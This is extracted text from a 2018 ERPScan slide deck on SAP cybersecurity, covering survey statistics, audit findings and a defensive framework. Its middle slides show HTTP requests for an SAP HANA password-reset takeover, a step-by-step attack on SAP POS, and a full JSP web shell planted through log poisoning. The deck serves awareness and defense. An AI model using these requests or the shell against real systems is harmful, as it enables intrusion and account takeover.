sap cybersecurity 2018 - erpscan · approach to sap security should change too. 1. world has...

SAP Cybersecurity 2018

Cyber attack kill chain

3

THE CHALLENGES WE FACE

4

• Network security• Web Application security• Endpoint security• Identity and access governance• Threat Detection and Incident response • Business application security

Just detecting/preventinginitial intrusion

that’s where a real attack happens

THE CISO RESPONSIBILITIES

5Approach to SAP security should change too

1. World has changed• increased connectivity

• boundless companies

2. SAP has changed• cloud and Mobile access from anywhere

• global platform rather than legacy tool

3. Attackers has changed• hackers are going up on application stack

• Every year we see a major incidents with SAP systems Source: ERP Cybersecurity Survey 2017

WHY

6

The story of a small SAP vulnerability

Source: Owner of USIS files for bankruptcy. The HeraldSource: USIS cuts more than 2,500 jobs after losing contracts in wake of cyberattack. The Washington Post

USIS DATA BREACH

7

ERP SECURITYQ: What are the most critical business applications?

Business Intelligence (BI/BW) 36% | Supply Chain Management 32% | Product Lifecycle Management (PLM) 30% | Enterprise Asset Management (EAM) 27% | Supplier Relationship Management (SRM) 18% | Manufacturing Execution System (MES) 18%

Q: What kind of Business applications are used in your company?

Source: ERP Cybersecurity Survey 2017

Source: Top New and Cool Technologies and Representative Vendors in Security, 2017. Gartner Risk Management Summit 2017 by Neil MacDonald

• Breach/Attack simulation• Digital supply chain, risk assessment services• Encryption by default, encryption everywhere• Anti-fraud/bot protection platforms (UI protection)• ERP-specific security/business-critical application security• Data flow discovery, monitoring and analytics• Bug bounty programs, crowdsourced and pen testing aaS• Cloud firewalls and UTMs for branch office and SOHO• ERP + EDR merger = advanced endpoint protection• IoT/OT discovery, visibility, monitoring and deception• SecOps chat

RADAR SCREEN – WHAT’S NEXT ON THE HORIZON?

9

HOW IMPORTANTCyberattacks on ERP


Q: How will the number of cyberattacks against ERP Systems change within the next 2-3 years?

SAP SECURITYWhy hacking SAP?

• EspionageTo steal financial or HR data, supplier and customer lists or disclose corporate secrets.

• Sabotage To cause denial of service, counterfeit financial records and accounting data, access technology network (SCADA).

• FraudTo carry out false transactions, modify master data.

10

11

SAP ATTACKHow much does it cost?


12

SAP SECURITYHow many vulnerabilities were found?

• 4000+ in all SAP products

• 2800+ in SAP NetWeaver ABAP based systems

• 1500+ in basic components which are the same in every system

• 400+ in ECC modules More details here: https://goo.gl/Hr144b

13

Q: Which of the following incidents related to SAP Security have you heard about most?

WHY DO ORGANIZATIONS LACK ERP SECURITY?


14

Q: Who will be responsible if your ERP System is breached?Who is the person most accountable if your organization has a SAP breach?

Source: Uncovering the Risks of SAP Cyber Breaches. Ponemon Institute Source: ERP Cybersecurity Survey 2017

RESPONSIBILITY

Vulnerabilities3 latest examples

16

Vulnerabilities 1:SAP HANA

17

User-Self-Service

• Available since SPS09 • Deactivated by default • Speed up the following processes:

o Forgotyourpassword? o Requestaccount

• Administrators must approve the accounts to activate them

USS

18

```POST /sap/hana/xs/selfService/user/selfService.xsjs

HTTP/1.1Host: <host>:<port>Content-Type: application/jsonX-Requested-With:XMLHttpRequestContent-Length: 137DNT: 1Connection: close

{"action":"createNewUser","username":"<username>","email":"<email>","x-sap-origin-location":""}```

Create new user attempt

• The user self-service tools of SAP HANA contain vulnerabilities. An unauthenticated user might be able to impersonate other users, including administrative accounts.

• An attacker needs a security token to reproduce this vulnerability. The attacker must send a request to create an user, and the server will send the security token via e-mail.

USS

19

• After the attacker receives the security token, he or she can change the password to any user with the following request

```POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1Host: <host>:<port>Content-Type: application/jsonX-Requested-With: XMLHttpRequesConten-Lenght:DNT: 1Conection: close

{"pwd":"<pass>","confirmPwd":"<pass>","securitytoken":"<token>","securityQues":"1","securityAns":"{\"username\":\"SYSTEM\",\"time\":\"2020-01-10T22:10:06,024Z\"}|","action":"savePassword"}````

• Changing any users password is possible with a combination of the two vulnerabilities• The attacker can inject additional variables into json request and json parser will parse and save them

into USS security storage• Additional variables will be injected in sql request without any checks from USS security storage.

Source code

USS

20

How to buy MacBook for $1Vulnerability 2:

21

Xpress Server

POS Client

POS client

22

Xpress Server

POS Client

POS client

23

Xpress Server

POS Client

POS client

25

Xpress Server

POS client

26

1. Store configurator creates config files and Xpress Server will apply them, if it finds a ”newparm.trg” file in the special directory.

2. We can write any data we want in any file on Xpress Server using port 2200.

3. POS Clients (Terminals) update their parameters after opening.4. We can close and open POS Terminals using telnet and port 2202.

4 FACTS ABOUT SAP POSCAN HELP US MAKE A TRICK

27

Attacker Xpress Server

POS Client

PORT 2202

Database

PORT 2200

28


POS Client

PORT 2202

PORT 2200

1 Evil Configuration files

Database

29


POS Client

PORT 2202

PORT 2200


2 Trigger file ”newparm.trg”

Database

30


POS Client

PORT 2202

PORT 2200



3 Apply new settings

Database

31


POS Client

PORT 2202

PORT 2200




4 Write some of them in database

Database

32


POS Client

PORT 2202

PORT 2200





5 Close Terminal

Database

33


POS Client

PORT 2202

PORT 2200





5 Close Terminal

6 Close Terminal

Database

34


POS Client

PORT 2202

PORT 2200





5 Close Terminal

6 Close Terminal

7 Open Terminal

Database

35


POS Client

PORT 2202

PORT 2200





5 Close Terminal

6 Close Terminal

7 Open Terminal

8 Open Terminal

Database

36


POS Client

PORT 2202

PORT 2200





5 Close Terminal

6 Close Terminal

7 Open Terminal

8 Open Terminal

9 Get evil Configuration files

Database

37


POS Client

PORT 2202

PORT 2200





5 Close Terminal

6 Close Terminal

7 Open Terminal

8 Open Terminal

9 Get evil Configuration files

Database

38

How to steal all CRM accountsVulnerability 2:

39

One of the thousands

SAP REDWOOD APP

40

Source code

SAP REDWOOD APP

41

Directory traversal

REDWOOD APP

42

CRM ADMIN CONSOLE

43

CRM LOGGING CONFIGURATION

44

Typical .jsp shell<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("cmd") != null){

Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println ("<PRE>");while ( disr != null ) {

out.println(disr);disr = dis.readLine();

}out.println ("</PRE>");

} %>

EXAMPLE OF EVIL CODE

45

By sending http request

WRITING EVIL CODE

46

THE EVIL CODE IN THE LOG FILE

47

With help of evil code

COMMAND EXECUTION

StatisticsThe most vulnerable industries

49

46%

MOST VULNERABLE INDUSTRIES

30% 15%• An average company using SAP has 35% of security parameters configured unsafely• Manufacturing companies fail in Patch Management: more then 40% do not implement SAP Security Notes• IT industry fails in encryption: 90% of companies do not implement SSL/SNC for RFC connections

50

MOST VULNERABLE COMPONENTS

MESSAGE SERVERGateway(35% companies)

MMC(45% companies)

Host Control(5% companies)

Enqueue(13% companies)

>70% COMPANIES HAS CRITICAL VULNS

51

USER SECURITY

Profile:• ~ 55 users has SAP_ALL profile assigned• ~ 20 RFCs use default users

(SAPCPIC, TMSADM, EARLYWATCH, …)

Passwords:• 10% of passwords vulnerable to dictionary attacks• In most systems default length is 6 chars• 91% Oil & Gas companies didn’t configure

complexity requirements at all• 63% of all companies allow never expiring passwords

2&

23&

32&

54&

SAP* DDIC TMSADM SAPCPIC

% systems with default passwords

In audits we’ve found at least one SAP system with default users/passwords!99%

52

HTTPS:

ENCRYPTION

83%

P4SEC: NEVER!

SNC: 37%! 90% of IT companies

don't use encryption to protect RFC at all

Only in 3% of all cases SAP system validate clients' certificates

53

SAP ABAP Security Audit Log

LOGGINGUser actions: logons, access to reports and tables, executions of transactions

SAP ABAP HTTP logs(ICM/MS/WebDispatcher)

Attacks: SQL Injection, XSS, XXE, RCE, DoS, Directory Traversal…

Enabled in 57% systems

Gateway Network actions, RFC actions, dynamic parameter changes

Maximum audit log file size is less then

ICM: enabled in 38% systems

MS: enabled in 27% systems

WD: enabled in 23% systems

Enabled in 15% systems

200M

Enable all logs, set big enough file size (~2 Gb), archive and rotate logs

54

RECOMMENDATIONSOil & Gas, Energy, Manufacturing industries adapt slowly:

• Delayed patching• Lack of staff trained in security• Deluded SCADA systems are isolated from ERP systems

All:• Lack of control• Default users/passwords• Disabled logs

IT & Finance industry:• No encryption• Custom development• Everchanging landscape

Pentest them to convince the management implement security controls

Monitor user actions and systems’ behaviour

Scan systems’ security configurations

DefenseBusiness Case for SAP Cybersecurity Framework

56

CURRENT STATE

CISO

CIO

PATCHING SAP SYSTEMS

SAP BASIS

SAP SECURITY

SEGREGATION OF DUTIES

IT OPERATIONS

MONITORING SAP SYSTEMS

ENTERPRISE SECURITY

VULNERABILITY MANAGEMENT

LACK OF EFFECTIVE OVERSIGHT

LACK OF VISIBILITY

COMPLEXITYPOOR

INTEGRATION

SLIPPED THROUGH THE CRACKS

57

FUTURE STATECISO CIO

ENTERPRISE SECURITY

Vulnerability Management+ Asset Management+ Risk Management+ Secure Development

SAP BASIS

Patching SAP systems+ Incident Response+ Mitigation+ Improvements

SAP SECURITY

Segregation Of Duties+ Data Security+ Secure Architecture+ Awareness and Training

IT OPERATIONS

Monitoring SAP systems+ Threat Detection+ User Behavior+ Data Leakage

CRO

58

EAS-SEC

Gartner: Designing an Adaptive Security Architecture for Protection From Advanced AttacksSource: https://www.gartner.com/doc/2665515/

HISTORY

60

Category PREDICT

Process Secure Development

Purpose To ensure security during SAP systems development and acquisition.

Outcomes• Security Requirements• Development Standards and Processes• Security Plans

Implementation steps

1. Develop basic security requirements to configuration of servers, networks, SAP applications and client stations

2. Create secure development standards and processes3. Automate secure development processes

SAP CYBERSECURITY FRAMEWORK

61

50%

80% 99%

3-6 months

6-12 months 12 months

23

IMPLEMENTATION TIERS

1

62

SAP Cybersecurity Framework

Security Program

Security Policies

Security Plans

Process Descriptions

Technical Solutions

BENEFITS

PREDICTUnderstand SAP environment

64

PREDICTProcess Purpose

Asset Management To communicate information about SAP assets, security category of the assets, rules of acceptable use and protection requirements

Business Environment To provide SAP business context, ensure cybersecurity continuity of SAP systems and address cybersecurity in supplier relationships

GovernanceTo develop cybersecurity policies, roles, responsibilities and procedures to ensure SAP cybersecurity is understood and integrated to organization operational and management processes

Vulnerability Management

To provide cybersecurity assurance in SAP systems by assessing vulnerabilities and reducing attack vectors

Risk Management To make decisions on addressing possible adverse impacts from the operation and use of SAP systems

Secure Development To ensure security during SAP systems development and acquisition

65

VULNERABILITY MANAGEMENT

Regularly perform SAP security audits and penetration tests

Repeatedly scan SAP systems for vulnerabilities, recommend and track remediations

Monitor vulnerabilities, remediations and threats online from public and private sources and threat intelligence feeds

Implementation: Outcomes:

Purpose: To provide cybersecurity assurance in SAP systems by assessing vulnerabilities and reducing attack vectors

1

2

3

• Scan Plans

• Scan Profiles

• Remediation Plans

PREVENTReduce the surface area of attack

67

PREVENT

Process Purpose

Access Control To limit rights of authorized users and prevent unauthorized use of an SAP system

Awareness and Training To provide personnel and contractors cybersecurity awareness education and trainings to perform their duties and responsibilities

Data Security To enforce requirements to confidentiality, integrity and availability of information in SAP systems on the data layer

Secure Architecture To ensure security of all SAP solutions through-out all SAP components, connections, infrastructure and security controls

68

ACCESS CONTROL

Access Rules

Access Mechanisms

Access Control Reports

Secure the network, servers and endpoint devices

Implement role-based access control to SAP functionality

Enforce Segregation of Duties controls according to business process rules


Purpose: To limit rights of authorized users and prevent unauthorized use of an SAP system

1

2

3

69

ACCESS CONTROL. HOW TO CREATE A USER?

Ways to create a user in SAP system:1. Transaction SU01

2. Database table USR02

3. RFC function BAPI_USER_CREATE

4. Web exploit using InvokerServlet feature and CTC servlet

Number of objects:1. More then 300 000 transactions

2. More then 500 000 tables

3. More then 40 000 RFC functions

4. 500 known web exploits

DETECTMonitor threats

71

DETECT

Process Purpose

Event Management To collect information on SAP security related events

Threat Detection To detect attacks and possible threats to SAP systems

User Behavior To detect deviations of user behavior from typical in SAP systems

Data Leakage To detect data leakages in SAP systems

72

EVENT MANAGEMENT. EVENT SOURCES

o SAP ABAP Security logo SAP ABAP Audit logo SAP ABAP HTTP logo SAP ABAP ICM Security logo SAP ABAP RFC logo SAP J2EE HTTP logo SAP HANA Security logo SAP HANA log

More than 30 logs

Log Management Solutions

73

THREAT DETECTION

• Threat Catalogue

• Threat Data Sources

• Threat Detection Rules


Purpose: To detect attacks and possible threats to SAP systems

1

2

3

Configure IDS/IPS systems to detect SAP attack signatures

Manually review SAP security events

Monitor potential attacks, security event combinations and anomalies

RESPONDInvestigate, take actions and improve

75

RESPOND

Process Purpose

Incident Response To systematically respond to violation or threat of violation of SAP security policies and practices

Clear Communications To establish structure for SAP security responsibility in a business and provide means for clear communications between its members

Continuous Analysis To continuously monitor effectiveness of SAP security processes and provide insights into state of SAP security

Mitigation To design and model changes to security of SAP systems

Improvements To learn from external events and internal assessments of SAP security controls

76

MITIGATION. VIRTUAL PATCHING

77

77

THANK YOU

USA:228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301Phone 650.798.5255

EU:Luna ArenA 238 Herikerbergweg, 1101 CM AmsterdamPhone +31 20 8932892

EU:Štětkova 1638/18, Prague 4 - Nusle,

140 00, Czech Republic

Read our blogerpscan.com/category/press-center/blog/

Join our webinarserpscan.com/category/press-center/events/

Subscribe to our newsletterseepurl.com/bef7h1

[email protected]

Alexander PolyakovCTO, [email protected]

78

sap cybersecurity 2018 - erpscan · approach to sap security should change too. 1. world has...

Documents